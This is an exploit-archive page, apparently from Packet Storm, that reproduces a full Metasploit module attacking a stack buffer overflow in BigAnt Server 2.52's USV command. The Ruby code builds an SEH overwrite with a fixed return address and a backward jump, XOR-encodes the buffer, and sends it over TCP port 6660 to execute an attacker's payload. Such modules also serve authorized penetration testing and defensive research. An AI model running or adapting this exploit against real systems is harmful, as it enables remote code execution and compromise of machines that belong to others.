what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

BigAnt Server 2.52 USV Buffer Overflow

BigAnt Server 2.52 USV Buffer Overflow
Posted Jan 5, 2010
Authored by jduck, DouBle_Zer0, Lincoln | Site metasploit.com

This exploits a stack overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This Metasploit module was tested successfully against version 2.52. NOTE: The AntServer service does not restart, you only get one shot.

tags | exploit, overflow
SHA-256 | dd69ef386f696d716346934cec43c21dfd0dbc94932dacb7f54813b7d02a26ca

BigAnt Server 2.52 USV Buffer Overflow

Change Mirror Download
##
# $Id: bigant_server_usv.rb 8071 2010-01-05 11:49:12Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'BigAnt Server 2.52 USV Buffer Overflow',
'Description' => %q{
This exploits a stack overflow in the BigAnt Messaging Service,
part of the BigAnt Server product suite. This module was tested
successfully against version 2.52.

NOTE: The AntServer service does not restart, you only get one shot.
},
'Author' =>
[
'Lincoln',
'DouBle_Zer0',
'jduck'
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 8071 $',
'References' =>
[
[ 'OSVDB', '61386' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10765' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10973' ]
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => (218+709+35),
'BadChars' => "\x2a\x20\x27\x0a\x0f",
# pre-xor with 0x2a:
#'BadChars' => "\x00\x0a\x0d\x20\x25",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'BigAnt 2.52 Universal', { 'Ret' => 0x1b019fd6 } ], # Tested OK (jduck) p/p/r msjet40.dll xpsp3
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 29 2009'))

register_options([Opt::RPORT(6660)], self.class)
end

def exploit
connect

sploit = ""
sploit << payload.encoded
sploit << generate_seh_record(target.ret)
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + payload_space.to_s).encode_string
sploit << rand_text_alphanumeric(3)
sploit << [0xdeadbeef].pack('V') * 3

# the buffer gets xor'd with 0x2a !
0.upto(sploit.length-1) do |idx|
sploit[idx] = sploit[idx] ^ 0x2a
end

print_status("Trying target #{target.name}...")
sock.put("USV " + sploit + "\r\n\r\n")

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close